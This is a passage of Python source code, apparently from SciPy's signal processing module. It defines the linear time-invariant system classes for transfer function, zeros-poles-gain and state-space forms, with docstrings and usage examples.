        >>> w, mag, phase = sys.bode()

        >>> plt.figure()
        >>> plt.semilogx(w, mag)    # Bode magnitude plot
        >>> plt.figure()
        >>> plt.semilogx(w, phase)  # Bode phase plot
        >>> plt.show()
        """
        return bode(self, w=w, n=n)

    def freqresp(self, w=None, n=10000):
        """
        Calculate the frequency response of a continuous-time system.

        Returns a 2-tuple containing arrays of frequencies [rad/s] and
        complex magnitude.
        See `freqresp` for details.
        """
        return freqresp(self, w=w, n=n)

    def to_discrete(self, dt, method='zoh', alpha=None):
        """Return a discretized version of the current system.

        Parameters: See `cont2discrete` for details.

        Returns
        -------
        sys: instance of `dlti`
        """
        # Concrete subclasses (e.g. TransferFunctionContinuous) override this.
        raise NotImplementedError('to_discrete is not implemented for this '
                                  'system class.')
class dlti(LinearTimeInvariant):
    """
    Discrete-time linear time invariant system base class.

    Parameters
    ----------
    *system: arguments
        The `dlti` class can be instantiated with either 2, 3 or 4 arguments.
        The following gives the number of arguments and the corresponding
        discrete-time subclass that is created:

        * 2: `TransferFunction`: (numerator, denominator)
        * 3: `ZerosPolesGain`: (zeros, poles, gain)
        * 4: `StateSpace`: (A, B, C, D)

        Each argument can be an array or a sequence.
    dt: float, optional
        Sampling time [s] of the discrete-time systems. Defaults to ``True``
        (unspecified sampling time). Must be specified as a keyword argument,
        for example, ``dt=0.1``.

    See Also
    --------
    ZerosPolesGain, StateSpace, TransferFunction, lti

    Notes
    -----
    `dlti` instances do not exist directly. Instead, `dlti` creates an instance
    of one of its subclasses: `StateSpace`, `TransferFunction` or
    `ZerosPolesGain`.

    Changing the value of properties that are not directly part of the current
    system representation (such as the `zeros` of a `StateSpace` system) is
    very inefficient and may lead to numerical inaccuracies. It is better to
    convert to the specific system representation first. For example, call
    ``sys = sys.to_zpk()`` before accessing/changing the zeros, poles or gain.

    If (numerator, denominator) is passed in for ``*system``, coefficients for
    both the numerator and denominator should be specified in descending
    exponent order (e.g., ``z^2 + 3z + 5`` would be represented as ``[1, 3,
    5]``).

    .. versionadded:: 0.18.0

    Examples
    --------
    >>> from scipy import signal

    >>> signal.dlti(1, 2, 3, 4)
    StateSpaceDiscrete(
    array([[1]]),
    array([[2]]),
    array([[3]]),
    array([[4]]),
    dt: True
    )

    >>> signal.dlti(1, 2, 3, 4, dt=0.1)
    StateSpaceDiscrete(
    array([[1]]),
    array([[2]]),
    array([[3]]),
    array([[4]]),
    dt: 0.1
    )

    >>> signal.dlti([1, 2], [3, 4], 5, dt=0.1)
    ZerosPolesGainDiscrete(
    array([1, 2]),
    array([3, 4]),
    5,
    dt: 0.1
    )

    >>> signal.dlti([3, 4], [1, 2], dt=0.1)
    TransferFunctionDiscrete(
    array([ 3.,  4.]),
    array([ 1.,  2.]),
    dt: 0.1
    )
    """

    def __new__(cls, *system, **kwargs):
        """Create an instance of the appropriate subclass."""
        # Dispatch on argument count: 2 -> tf, 3 -> zpk, 4 -> state space.
        if cls is dlti:
            N = len(system)
            if N == 2:
                return TransferFunctionDiscrete.__new__(
                    TransferFunctionDiscrete, *system, **kwargs)
            elif N == 3:
                return ZerosPolesGainDiscrete.__new__(ZerosPolesGainDiscrete,
                                                      *system, **kwargs)
            elif N == 4:
                return StateSpaceDiscrete.__new__(StateSpaceDiscrete, *system,
                                                  **kwargs)
            else:
                raise ValueError("`system` needs to be an instance of `dlti` "
                                 "or have 2, 3 or 4 arguments.")
        # __new__ was called from a subclass, let it call its own functions
        return super(dlti, cls).__new__(cls)

    def __init__(self, *system, **kwargs):
        """
        Initialize the `lti` baseclass.

        The heavy lifting is done by the subclasses.
        """
        # `True` means "discrete with unspecified sampling time".
        dt = kwargs.pop('dt', True)
        super(dlti, self).__init__(*system, **kwargs)
        self.dt = dt

    @property
    def dt(self):
        """Return the sampling time of the system."""
        return self._dt

    @dt.setter
    def dt(self, dt):
        self._dt = dt

    def impulse(self, x0=None, t=None, n=None):
        """
        Return the impulse response of the discrete-time `dlti` system.
        See `dimpulse` for details.
        """
        return dimpulse(self, x0=x0, t=t, n=n)

    def step(self, x0=None, t=None, n=None):
        """
        Return the step response of the discrete-time `dlti` system.
        See `dstep` for details.
        """
        return dstep(self, x0=x0, t=t, n=n)

    def output(self, u, t, x0=None):
        """
        Return the response of the discrete-time system to input `u`.
        See `dlsim` for details.
        """
        return dlsim(self, u, t, x0=x0)

    def bode(self, w=None, n=100):
        """
        Calculate Bode magnitude and phase data of a discrete-time system.

        Returns a 3-tuple containing arrays of frequencies [rad/s], magnitude
        [dB] and phase [deg]. See `dbode` for details.

        Examples
        --------
        >>> from scipy import signal
        >>> import matplotlib.pyplot as plt

        Transfer function: H(z) = 1 / (z^2 + 2z + 3) with sampling time 0.5s

        >>> sys = signal.TransferFunction([1], [1, 2, 3], dt=0.5)

        Equivalent: signal.dbode(sys)

        >>> w, mag, phase = sys.bode()

        >>> plt.figure()
        >>> plt.semilogx(w, mag)    # Bode magnitude plot
        >>> plt.figure()
        >>> plt.semilogx(w, phase)  # Bode phase plot
        >>> plt.show()
        """
        return dbode(self, w=w, n=n)

    def freqresp(self, w=None, n=10000, whole=False):
        """
        Calculate the frequency response of a discrete-time system.

        Returns a 2-tuple containing arrays of frequencies [rad/s] and
        complex magnitude.
        See `dfreqresp` for details.
        """
        return dfreqresp(self, w=w, n=n, whole=whole)
class TransferFunction(LinearTimeInvariant):
    r"""Linear Time Invariant system class in transfer function form.

    Represents the system as the continuous-time transfer function
    :math:`H(s)=\sum_{i=0}^N b[N-i] s^i / \sum_{j=0}^M a[M-j] s^j` or the
    discrete-time transfer function
    :math:`H(s)=\sum_{i=0}^N b[N-i] z^i / \sum_{j=0}^M a[M-j] z^j`, where
    :math:`b` are elements of the numerator `num`, :math:`a` are elements of
    the denominator `den`, and ``N == len(b) - 1``, ``M == len(a) - 1``.
    `TransferFunction` systems inherit additional
    functionality from the `lti`, respectively the `dlti` classes, depending on
    which system representation is used.

    Parameters
    ----------
    *system: arguments
        The `TransferFunction` class can be instantiated with 1 or 2
        arguments. The following gives the number of input arguments and their
        interpretation:

        * 1: `lti` or `dlti` system: (`StateSpace`, `TransferFunction` or
          `ZerosPolesGain`)
        * 2: array_like: (numerator, denominator)
    dt: float, optional
        Sampling time [s] of the discrete-time systems. Defaults to `None`
        (continuous-time). Must be specified as a keyword argument, for
        example, ``dt=0.1``.

    See Also
    --------
    ZerosPolesGain, StateSpace, lti, dlti
    tf2ss, tf2zpk, tf2sos

    Notes
    -----
    Changing the value of properties that are not part of the
    `TransferFunction` system representation (such as the `A`, `B`, `C`, `D`
    state-space matrices) is very inefficient and may lead to numerical
    inaccuracies. It is better to convert to the specific system
    representation first. For example, call ``sys = sys.to_ss()`` before
    accessing/changing the A, B, C, D system matrices.

    If (numerator, denominator) is passed in for ``*system``, coefficients
    for both the numerator and denominator should be specified in descending
    exponent order (e.g. ``s^2 + 3s + 5`` or ``z^2 + 3z + 5`` would be
    represented as ``[1, 3, 5]``)

    Examples
    --------
    Construct the transfer function:

    .. math:: H(s) = \frac{s^2 + 3s + 3}{s^2 + 2s + 1}

    >>> from scipy import signal

    >>> num = [1, 3, 3]
    >>> den = [1, 2, 1]

    >>> signal.TransferFunction(num, den)
    TransferFunctionContinuous(
    array([ 1.,  3.,  3.]),
    array([ 1.,  2.,  1.]),
    dt: None
    )

    Contruct the transfer function with a sampling time of 0.1 seconds:

    .. math:: H(z) = \frac{z^2 + 3z + 3}{z^2 + 2z + 1}

    >>> signal.TransferFunction(num, den, dt=0.1)
    TransferFunctionDiscrete(
    array([ 1.,  3.,  3.]),
    array([ 1.,  2.,  1.]),
    dt: 0.1
    )
    """

    def __new__(cls, *system, **kwargs):
        """Handle object conversion if input is an instance of lti."""
        if len(system) == 1 and isinstance(system[0], LinearTimeInvariant):
            return system[0].to_tf()

        # Choose whether to inherit from `lti` or from `dlti`; the presence
        # of a `dt` keyword selects the discrete-time variant.
        if cls is TransferFunction:
            if kwargs.get('dt') is None:
                return TransferFunctionContinuous.__new__(
                    TransferFunctionContinuous,
                    *system,
                    **kwargs)
            else:
                return TransferFunctionDiscrete.__new__(
                    TransferFunctionDiscrete,
                    *system,
                    **kwargs)

        # No special conversion needed
        return super(TransferFunction, cls).__new__(cls)

    def __init__(self, *system, **kwargs):
        """Initialize the state space LTI system."""
        # Conversion of lti instances is handled in __new__
        if isinstance(system[0], LinearTimeInvariant):
            return

        # Remove system arguments, not needed by parents anymore
        super(TransferFunction, self).__init__(**kwargs)

        self._num = None
        self._den = None

        self.num, self.den = normalize(*system)

    def __repr__(self):
        """Return representation of the system's transfer function"""
        return '{0}(\n{1},\n{2},\ndt: {3}\n)'.format(
            self.__class__.__name__,
            repr(self.num),
            repr(self.den),
            repr(self.dt),
            )

    @property
    def num(self):
        """Numerator of the `TransferFunction` system."""
        return self._num

    @num.setter
    def num(self, num):
        self._num = atleast_1d(num)

        # Update dimensions: a 2-D numerator encodes multiple outputs/inputs.
        if len(self.num.shape) > 1:
            self.outputs, self.inputs = self.num.shape
        else:
            self.outputs = 1
            self.inputs = 1

    @property
    def den(self):
        """Denominator of the `TransferFunction` system."""
        return self._den

    @den.setter
    def den(self, den):
        self._den = atleast_1d(den)

    def _copy(self, system):
        """
        Copy the parameters of another `TransferFunction` object

        Parameters
        ----------
        system : `TransferFunction`
            The `TransferFunction` system that is to be copied
        """
        self.num = system.num
        self.den = system.den

    def to_tf(self):
        """
        Return a copy of the current `TransferFunction` system.

        Returns
        -------
        sys : instance of `TransferFunction`
            The current system (copy)
        """
        return copy.deepcopy(self)

    def to_zpk(self):
        """
        Convert system representation to `ZerosPolesGain`.

        Returns
        -------
        sys : instance of `ZerosPolesGain`
            Zeros, poles, gain representation of the current system
        """
        return ZerosPolesGain(*tf2zpk(self.num, self.den),
                              **self._dt_dict)

    def to_ss(self):
        """
        Convert system representation to `StateSpace`.

        Returns
        -------
        sys : instance of `StateSpace`
            State space model of the current system
        """
        return StateSpace(*tf2ss(self.num, self.den),
                          **self._dt_dict)

    @staticmethod
    def _z_to_zinv(num, den):
        """Change a transfer function from the variable `z` to `z**-1`.

        Parameters
        ----------
        num, den: 1d array_like
            Sequences representing the coefficients of the numerator and
            denominator polynomials, in order of descending degree of 'z'.
            That is, ``5z**2 + 3z + 2`` is presented as ``[5, 3, 2]``.

        Returns
        -------
        num, den: 1d array_like
            Sequences representing the coefficients of the numerator and
            denominator polynomials, in order of ascending degree of 'z**-1'.
            That is, ``5 + 3 z**-1 + 2 z**-2`` is presented as ``[5, 3, 2]``.
        """
        # Left-pad the shorter polynomial with zeros so both have equal length.
        diff = len(num) - len(den)
        if diff > 0:
            den = np.hstack((np.zeros(diff), den))
        elif diff < 0:
            num = np.hstack((np.zeros(-diff), num))
        return num, den

    @staticmethod
    def _zinv_to_z(num, den):
        """Change a transfer function from the variable `z**-1` to `z`.

        Parameters
        ----------
        num, den: 1d array_like
            Sequences representing the coefficients of the numerator and
            denominator polynomials, in order of ascending degree of 'z**-1'.
            That is, ``5 + 3 z**-1 + 2 z**-2`` is presented as ``[5, 3, 2]``.

        Returns
        -------
        num, den: 1d array_like
            Sequences representing the coefficients of the numerator and
            denominator polynomials, in order of descending degree of 'z'.
            That is, ``5z**2 + 3z + 2`` is presented as ``[5, 3, 2]``.
        """
        # Right-pad the shorter polynomial with zeros so both have equal length.
        diff = len(num) - len(den)
        if diff > 0:
            den = np.hstack((den, np.zeros(diff)))
        elif diff < 0:
            num = np.hstack((num, np.zeros(-diff)))
        return num, den
class TransferFunctionContinuous(TransferFunction, lti):
    r"""
    Continuous-time Linear Time Invariant system in transfer function form.

    Represents the system as the transfer function
    :math:`H(s)=\sum_{i=0}^N b[N-i] s^i / \sum_{j=0}^M a[M-j] s^j`, where
    :math:`b` are elements of the numerator `num`, :math:`a` are elements of
    the denominator `den`, and ``N == len(b) - 1``, ``M == len(a) - 1``.
    Continuous-time `TransferFunction` systems inherit additional
    functionality from the `lti` class.

    Parameters
    ----------
    *system: arguments
        The `TransferFunction` class can be instantiated with 1 or 2
        arguments. The following gives the number of input arguments and their
        interpretation:

        * 1: `lti` system: (`StateSpace`, `TransferFunction` or
          `ZerosPolesGain`)
        * 2: array_like: (numerator, denominator)

    See Also
    --------
    ZerosPolesGain, StateSpace, lti
    tf2ss, tf2zpk, tf2sos

    Notes
    -----
    Changing the value of properties that are not part of the
    `TransferFunction` system representation (such as the `A`, `B`, `C`, `D`
    state-space matrices) is very inefficient and may lead to numerical
    inaccuracies. It is better to convert to the specific system
    representation first. For example, call ``sys = sys.to_ss()`` before
    accessing/changing the A, B, C, D system matrices.

    If (numerator, denominator) is passed in for ``*system``, coefficients
    for both the numerator and denominator should be specified in descending
    exponent order (e.g. ``s^2 + 3s + 5`` would be represented as
    ``[1, 3, 5]``)

    Examples
    --------
    Construct the transfer function:

    .. math:: H(s) = \frac{s^2 + 3s + 3}{s^2 + 2s + 1}

    >>> from scipy import signal

    >>> num = [1, 3, 3]
    >>> den = [1, 2, 1]

    >>> signal.TransferFunction(num, den)
    TransferFunctionContinuous(
    array([ 1.,  3.,  3.]),
    array([ 1.,  2.,  1.]),
    dt: None
    )
    """

    def to_discrete(self, dt, method='zoh', alpha=None):
        """
        Returns the discretized `TransferFunction` system.

        Parameters: See `cont2discrete` for details.

        Returns
        -------
        sys: instance of `dlti` and `StateSpace`
        """
        # `cont2discrete` returns (num, den, dt); drop the trailing dt and
        # pass it explicitly so a discrete-time system is constructed.
        return TransferFunction(*cont2discrete((self.num, self.den),
                                               dt,
                                               method=method,
                                               alpha=alpha)[:-1],
                                dt=dt)
class TransferFunctionDiscrete(TransferFunction, dlti):
    r"""
    Discrete-time Linear Time Invariant system in transfer function form.

    Represents the system as the transfer function
    :math:`H(z)=\sum_{i=0}^N b[N-i] z^i / \sum_{j=0}^M a[M-j] z^j`, where
    :math:`b` are elements of the numerator `num`, :math:`a` are elements of
    the denominator `den`, and ``N == len(b) - 1``, ``M == len(a) - 1``.
    Discrete-time `TransferFunction` systems inherit additional functionality
    from the `dlti` class.

    Parameters
    ----------
    *system: arguments
        The `TransferFunction` class can be instantiated with 1 or 2
        arguments. The following gives the number of input arguments and their
        interpretation:

        * 1: `dlti` system: (`StateSpace`, `TransferFunction` or
          `ZerosPolesGain`)
        * 2: array_like: (numerator, denominator)
    dt: float, optional
        Sampling time [s] of the discrete-time systems. Defaults to `True`
        (unspecified sampling time). Must be specified as a keyword argument,
        for example, ``dt=0.1``.

    See Also
    --------
    ZerosPolesGain, StateSpace, dlti
    tf2ss, tf2zpk, tf2sos

    Notes
    -----
    Changing the value of properties that are not part of the
    `TransferFunction` system representation (such as the `A`, `B`, `C`, `D`
    state-space matrices) is very inefficient and may lead to numerical
    inaccuracies.

    If (numerator, denominator) is passed in for ``*system``, coefficients
    for both the numerator and denominator should be specified in descending
    exponent order (e.g., ``z^2 + 3z + 5`` would be represented as
    ``[1, 3, 5]``).

    Examples
    --------
    Construct the transfer function with a sampling time of 0.5 seconds:

    .. math:: H(z) = \frac{z^2 + 3z + 3}{z^2 + 2z + 1}

    >>> from scipy import signal

    >>> num = [1, 3, 3]
    >>> den = [1, 2, 1]

    >>> signal.TransferFunction(num, den, 0.5)
    TransferFunctionDiscrete(
    array([ 1.,  3.,  3.]),
    array([ 1.,  2.,  1.]),
    dt: 0.5
    )
    """
    # All behavior is inherited from TransferFunction and dlti.
    pass
class ZerosPolesGain(LinearTimeInvariant):
    r"""
    Linear Time Invariant system class in zeros, poles, gain form.

    Represents the system as the continuous- or discrete-time transfer function
    :math:`H(s)=k \prod_i (s - z[i]) / \prod_j (s - p[j])`, where :math:`k` is
    the `gain`, :math:`z` are the `zeros` and :math:`p` are the `poles`.
    `ZerosPolesGain` systems inherit additional functionality from the `lti`,
    respectively the `dlti` classes, depending on which system representation
    is used.

    Parameters
    ----------
    *system : arguments
        The `ZerosPolesGain` class can be instantiated with 1 or 3
        arguments. The following gives the number of input arguments and their
        interpretation:

        * 1: `lti` or `dlti` system: (`StateSpace`, `TransferFunction` or
          `ZerosPolesGain`)
        * 3: array_like: (zeros, poles, gain)
    dt: float, optional
        Sampling time [s] of the discrete-time systems. Defaults to `None`
        (continuous-time). Must be specified as a keyword argument, for
        example, ``dt=0.1``.

    See Also
    --------
    TransferFunction, StateSpace, lti, dlti
    zpk2ss, zpk2tf, zpk2sos

    Notes
    -----
    Changing the value of properties that are not part of the
    `ZerosPolesGain` system representation (such as the `A`, `B`, `C`, `D`
    state-space matrices) is very inefficient and may lead to numerical
    inaccuracies. It is better to convert to the specific system
    representation first. For example, call ``sys = sys.to_ss()`` before
    accessing/changing the A, B, C, D system matrices.

    Examples
    --------
    >>> from scipy import signal

    Transfer function: H(s) = 5(s - 1)(s - 2) / (s - 3)(s - 4)

    >>> signal.ZerosPolesGain([1, 2], [3, 4], 5)
    ZerosPolesGainContinuous(
    array([1, 2]),
    array([3, 4]),
    5,
    dt: None
    )

    Transfer function: H(z) = 5(z - 1)(z - 2) / (z - 3)(z - 4)

    >>> signal.ZerosPolesGain([1, 2], [3, 4], 5, dt=0.1)
    ZerosPolesGainDiscrete(
    array([1, 2]),
    array([3, 4]),
    5,
    dt: 0.1
    )
    """

    def __new__(cls, *system, **kwargs):
        """Handle object conversion if input is an instance of `lti`"""
        if len(system) == 1 and isinstance(system[0], LinearTimeInvariant):
            return system[0].to_zpk()

        # Choose whether to inherit from `lti` or from `dlti`; the presence
        # of a `dt` keyword selects the discrete-time variant.
        if cls is ZerosPolesGain:
            if kwargs.get('dt') is None:
                return ZerosPolesGainContinuous.__new__(
                    ZerosPolesGainContinuous,
                    *system,
                    **kwargs)
            else:
                return ZerosPolesGainDiscrete.__new__(
                    ZerosPolesGainDiscrete,
                    *system,
                    **kwargs
                    )

        # No special conversion needed
        return super(ZerosPolesGain, cls).__new__(cls)

    def __init__(self, *system, **kwargs):
        """Initialize the zeros, poles, gain system."""
        # Conversion of lti instances is handled in __new__
        if isinstance(system[0], LinearTimeInvariant):
            return

        super(ZerosPolesGain, self).__init__(**kwargs)

        self._zeros = None
        self._poles = None
        self._gain = None

        self.zeros, self.poles, self.gain = system

    def __repr__(self):
        """Return representation of the `ZerosPolesGain` system."""
        return '{0}(\n{1},\n{2},\n{3},\ndt: {4}\n)'.format(
            self.__class__.__name__,
            repr(self.zeros),
            repr(self.poles),
            repr(self.gain),
            repr(self.dt),
            )

    @property
    def zeros(self):
        """Zeros of the `ZerosPolesGain` system."""
        return self._zeros

    @zeros.setter
    def zeros(self, zeros):
        self._zeros = atleast_1d(zeros)

        # Update dimensions: a 2-D zeros array encodes multiple outputs/inputs.
        if len(self.zeros.shape) > 1:
            self.outputs, self.inputs = self.zeros.shape
        else:
            self.outputs = 1
            self.inputs = 1

    @property
    def poles(self):
        """Poles of the `ZerosPolesGain` system."""
        return self._poles

    @poles.setter
    def poles(self, poles):
        self._poles = atleast_1d(poles)

    @property
    def gain(self):
        """Gain of the `ZerosPolesGain` system."""
        return self._gain

    @gain.setter
    def gain(self, gain):
        self._gain = gain

    def _copy(self, system):
        """
        Copy the parameters of another `ZerosPolesGain` system.

        Parameters
        ----------
        system : instance of `ZerosPolesGain`
            The zeros, poles gain system that is to be copied
        """
        self.poles = system.poles
        self.zeros = system.zeros
        self.gain = system.gain

    def to_tf(self):
        """
        Convert system representation to `TransferFunction`.

        Returns
        -------
        sys : instance of `TransferFunction`
            Transfer function of the current system
        """
        return TransferFunction(*zpk2tf(self.zeros, self.poles, self.gain),
                                **self._dt_dict)

    def to_zpk(self):
        """
        Return a copy of the current 'ZerosPolesGain' system.

        Returns
        -------
        sys : instance of `ZerosPolesGain`
            The current system (copy)
        """
        return copy.deepcopy(self)

    def to_ss(self):
        """
        Convert system representation to `StateSpace`.

        Returns
        -------
        sys : instance of `StateSpace`
            State space model of the current system
        """
        return StateSpace(*zpk2ss(self.zeros, self.poles, self.gain),
                          **self._dt_dict)
class ZerosPolesGainContinuous(ZerosPolesGain, lti):
    r"""
    Continuous-time Linear Time Invariant system in zeros, poles, gain form.
    Represents the system as the continuous time transfer function
    :math:`H(s)=k \prod_i (s - z[i]) / \prod_j (s - p[j])`, where :math:`k` is
    the `gain`, :math:`z` are the `zeros` and :math:`p` are the `poles`.
    Continuous-time `ZerosPolesGain` systems inherit additional functionality
    from the `lti` class.
    Parameters
    ----------
    *system : arguments
        The `ZerosPolesGain` class can be instantiated with 1 or 3
        arguments. The following gives the number of input arguments and their
        interpretation:
            * 1: `lti` system: (`StateSpace`, `TransferFunction` or
              `ZerosPolesGain`)
            * 3: array_like: (zeros, poles, gain)
    See Also
    --------
    TransferFunction, StateSpace, lti
    zpk2ss, zpk2tf, zpk2sos
    Notes
    -----
    Changing the value of properties that are not part of the
    `ZerosPolesGain` system representation (such as the `A`, `B`, `C`, `D`
    state-space matrices) is very inefficient and may lead to numerical
    inaccuracies. It is better to convert to the specific system
    representation first. For example, call ``sys = sys.to_ss()`` before
    accessing/changing the A, B, C, D system matrices.
    Examples
    --------
    >>> from scipy import signal
    Transfer function: H(s) = 5(s - 1)(s - 2) / (s - 3)(s - 4)
    >>> signal.ZerosPolesGain([1, 2], [3, 4], 5)
    ZerosPolesGainContinuous(
    array([1, 2]),
    array([3, 4]),
    5,
    dt: None
    )
    """
    def to_discrete(self, dt, method='zoh', alpha=None):
        """
        Returns the discretized `ZerosPolesGain` system.
        Parameters: See `cont2discrete` for details.
        Returns
        -------
        sys: instance of `dlti` and `ZerosPolesGain`
        """
        # cont2discrete returns (zeros, poles, gain, dt); slice off the
        # trailing dt with [:-1] and pass dt explicitly as a keyword so the
        # ZerosPolesGain factory dispatches to the discrete subclass.
        return ZerosPolesGain(
            *cont2discrete((self.zeros, self.poles, self.gain),
                           dt,
                           method=method,
                           alpha=alpha)[:-1],
            dt=dt)
class ZerosPolesGainDiscrete(ZerosPolesGain, dlti):
    r"""
    Discrete-time Linear Time Invariant system in zeros, poles, gain form.
    Represents the system as the discrete-time transfer function
    :math:`H(z)=k \prod_i (z - z[i]) / \prod_j (z - p[j])`, where :math:`k` is
    the `gain`, :math:`z` are the `zeros` and :math:`p` are the `poles`.
    Discrete-time `ZerosPolesGain` systems inherit additional functionality
    from the `dlti` class.
    Parameters
    ----------
    *system : arguments
        The `ZerosPolesGain` class can be instantiated with 1 or 3
        arguments. The following gives the number of input arguments and their
        interpretation:
            * 1: `dlti` system: (`StateSpace`, `TransferFunction` or
              `ZerosPolesGain`)
            * 3: array_like: (zeros, poles, gain)
    dt: float, optional
        Sampling time [s] of the discrete-time systems. Defaults to `True`
        (unspecified sampling time). Must be specified as a keyword argument,
        for example, ``dt=0.1``.
    See Also
    --------
    TransferFunction, StateSpace, dlti
    zpk2ss, zpk2tf, zpk2sos
    Notes
    -----
    Changing the value of properties that are not part of the
    `ZerosPolesGain` system representation (such as the `A`, `B`, `C`, `D`
    state-space matrices) is very inefficient and may lead to numerical
    inaccuracies. It is better to convert to the specific system
    representation first. For example, call ``sys = sys.to_ss()`` before
    accessing/changing the A, B, C, D system matrices.
    Examples
    --------
    >>> from scipy import signal
    Transfer function: H(s) = 5(s - 1)(s - 2) / (s - 3)(s - 4)
    >>> signal.ZerosPolesGain([1, 2], [3, 4], 5)
    ZerosPolesGainContinuous(
    array([1, 2]),
    array([3, 4]),
    5,
    dt: None
    )
    Transfer function: H(z) = 5(z - 1)(z - 2) / (z - 3)(z - 4)
    >>> signal.ZerosPolesGain([1, 2], [3, 4], 5, dt=0.1)
    ZerosPolesGainDiscrete(
    array([1, 2]),
    array([3, 4]),
    5,
    dt: 0.1
    )
    """
    # All behavior is inherited; this subclass only fixes the lti/dlti
    # parentage chosen by ZerosPolesGain.__new__.
    pass
def _atleast_2d_or_none(arg):
if arg is not None:
return atleast_2d(arg)
class StateSpace(LinearTimeInvariant):
    r"""
    Linear Time Invariant system in state-space form.
    Represents the system as the continuous-time, first order differential
    equation :math:`\dot{x} = A x + B u` or the discrete-time difference
    equation :math:`x[k+1] = A x[k] + B u[k]`. `StateSpace` systems
    inherit additional functionality from the `lti`, respectively the `dlti`
    classes, depending on which system representation is used.
    Parameters
    ----------
    *system: arguments
        The `StateSpace` class can be instantiated with 1 or 3 arguments.
        The following gives the number of input arguments and their
        interpretation:
            * 1: `lti` or `dlti` system: (`StateSpace`, `TransferFunction` or
              `ZerosPolesGain`)
            * 4: array_like: (A, B, C, D)
    dt: float, optional
        Sampling time [s] of the discrete-time systems. Defaults to `None`
        (continuous-time). Must be specified as a keyword argument, for
        example, ``dt=0.1``.
    See Also
    --------
    TransferFunction, ZerosPolesGain, lti, dlti
    ss2zpk, ss2tf, zpk2sos
    Notes
    -----
    Changing the value of properties that are not part of the
    `StateSpace` system representation (such as `zeros` or `poles`) is very
    inefficient and may lead to numerical inaccuracies. It is better to
    convert to the specific system representation first. For example, call
    ``sys = sys.to_zpk()`` before accessing/changing the zeros, poles or gain.
    Examples
    --------
    >>> from scipy import signal
    >>> a = np.array([[0, 1], [0, 0]])
    >>> b = np.array([[0], [1]])
    >>> c = np.array([[1, 0]])
    >>> d = np.array([[0]])
    >>> sys = signal.StateSpace(a, b, c, d)
    >>> print(sys)
    StateSpaceContinuous(
    array([[0, 1],
           [0, 0]]),
    array([[0],
           [1]]),
    array([[1, 0]]),
    array([[0]]),
    dt: None
    )
    >>> sys.to_discrete(0.1)
    StateSpaceDiscrete(
    array([[ 1. ,  0.1],
           [ 0. ,  1. ]]),
    array([[ 0.005],
           [ 0.1  ]]),
    array([[1, 0]]),
    array([[0]]),
    dt: 0.1
    )
    >>> a = np.array([[1, 0.1], [0, 1]])
    >>> b = np.array([[0.005], [0.1]])
    >>> signal.StateSpace(a, b, c, d, dt=0.1)
    StateSpaceDiscrete(
    array([[ 1. ,  0.1],
           [ 0. ,  1. ]]),
    array([[ 0.005],
           [ 0.1  ]]),
    array([[1, 0]]),
    array([[0]]),
    dt: 0.1
    )
    """
    def __new__(cls, *system, **kwargs):
        """Create new StateSpace object and settle inheritance."""
        # Handle object conversion if input is an instance of `lti`
        if len(system) == 1 and isinstance(system[0], LinearTimeInvariant):
            return system[0].to_ss()
        # Choose whether to inherit from `lti` or from `dlti`:
        # dt is None -> continuous time, otherwise -> discrete time.
        if cls is StateSpace:
            if kwargs.get('dt') is None:
                return StateSpaceContinuous.__new__(StateSpaceContinuous,
                                                    *system, **kwargs)
            else:
                return StateSpaceDiscrete.__new__(StateSpaceDiscrete,
                                                  *system, **kwargs)
        # No special conversion needed
        return super(StateSpace, cls).__new__(cls)
    def __init__(self, *system, **kwargs):
        """Initialize the state space lti/dlti system."""
        # Conversion of lti instances is handled in __new__
        if isinstance(system[0], LinearTimeInvariant):
            return
        # Remove system arguments, not needed by parents anymore
        super(StateSpace, self).__init__(**kwargs)
        # Backing fields for the A/B/C/D properties.
        self._A = None
        self._B = None
        self._C = None
        self._D = None
        # abcd_normalize validates and broadcasts the four matrices to
        # mutually consistent shapes before they reach the setters.
        self.A, self.B, self.C, self.D = abcd_normalize(*system)
    def __repr__(self):
        """Return representation of the `StateSpace` system."""
        return '{0}(\n{1},\n{2},\n{3},\n{4},\ndt: {5}\n)'.format(
            self.__class__.__name__,
            repr(self.A),
            repr(self.B),
            repr(self.C),
            repr(self.D),
            repr(self.dt),
            )
    @property
    def A(self):
        """State matrix of the `StateSpace` system."""
        return self._A
    @A.setter
    def A(self, A):
        self._A = _atleast_2d_or_none(A)
    @property
    def B(self):
        """Input matrix of the `StateSpace` system."""
        return self._B
    @B.setter
    def B(self, B):
        self._B = _atleast_2d_or_none(B)
        # One column of B per system input.
        self.inputs = self.B.shape[-1]
    @property
    def C(self):
        """Output matrix of the `StateSpace` system."""
        return self._C
    @C.setter
    def C(self, C):
        self._C = _atleast_2d_or_none(C)
        # One row of C per system output.
        self.outputs = self.C.shape[0]
    @property
    def D(self):
        """Feedthrough matrix of the `StateSpace` system."""
        return self._D
    @D.setter
    def D(self, D):
        # D carries no new dimension information (it is outputs x inputs,
        # both already set by the B and C setters).
        self._D = _atleast_2d_or_none(D)
    def _copy(self, system):
        """
        Copy the parameters of another `StateSpace` system.
        Parameters
        ----------
        system : instance of `StateSpace`
            The state-space system that is to be copied
        """
        self.A = system.A
        self.B = system.B
        self.C = system.C
        self.D = system.D
    def to_tf(self, **kwargs):
        """
        Convert system representation to `TransferFunction`.
        Parameters
        ----------
        kwargs : dict, optional
            Additional keywords passed to `ss2zpk`
        Returns
        -------
        sys : instance of `TransferFunction`
            Transfer function of the current system
        """
        return TransferFunction(*ss2tf(self._A, self._B, self._C, self._D,
                                       **kwargs), **self._dt_dict)
    def to_zpk(self, **kwargs):
        """
        Convert system representation to `ZerosPolesGain`.
        Parameters
        ----------
        kwargs : dict, optional
            Additional keywords passed to `ss2zpk`
        Returns
        -------
        sys : instance of `ZerosPolesGain`
            Zeros, poles, gain representation of the current system
        """
        return ZerosPolesGain(*ss2zpk(self._A, self._B, self._C, self._D,
                                      **kwargs), **self._dt_dict)
    def to_ss(self):
        """
        Return a copy of the current `StateSpace` system.
        Returns
        -------
        sys : instance of `StateSpace`
            The current system (copy)
        """
        return copy.deepcopy(self)
class StateSpaceContinuous(StateSpace, lti):
    r"""
    Continuous-time Linear Time Invariant system in state-space form.
    Represents the system as the continuous-time, first order differential
    equation :math:`\dot{x} = A x + B u`.
    Continuous-time `StateSpace` systems inherit additional functionality
    from the `lti` class.
    Parameters
    ----------
    *system: arguments
        The `StateSpace` class can be instantiated with 1 or 3 arguments.
        The following gives the number of input arguments and their
        interpretation:
            * 1: `lti` system: (`StateSpace`, `TransferFunction` or
              `ZerosPolesGain`)
            * 4: array_like: (A, B, C, D)
    See Also
    --------
    TransferFunction, ZerosPolesGain, lti
    ss2zpk, ss2tf, zpk2sos
    Notes
    -----
